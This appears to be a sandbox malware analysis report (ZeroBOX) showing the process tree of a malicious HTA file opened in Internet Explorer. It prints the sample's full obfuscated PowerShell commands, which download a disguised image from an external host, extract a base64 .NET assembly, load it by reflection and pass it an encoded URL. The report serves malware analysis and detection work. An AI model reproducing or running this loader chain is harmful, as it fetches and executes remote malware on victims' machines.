popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\XLARFQ77802578790.pdf.hta.html

    904

    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:904 CREDAT:145409

      2264

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD

        1968

        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmpzaHZnaGp4YjQ2ZXNhYmVuaXp1Yy80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"

          2216

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf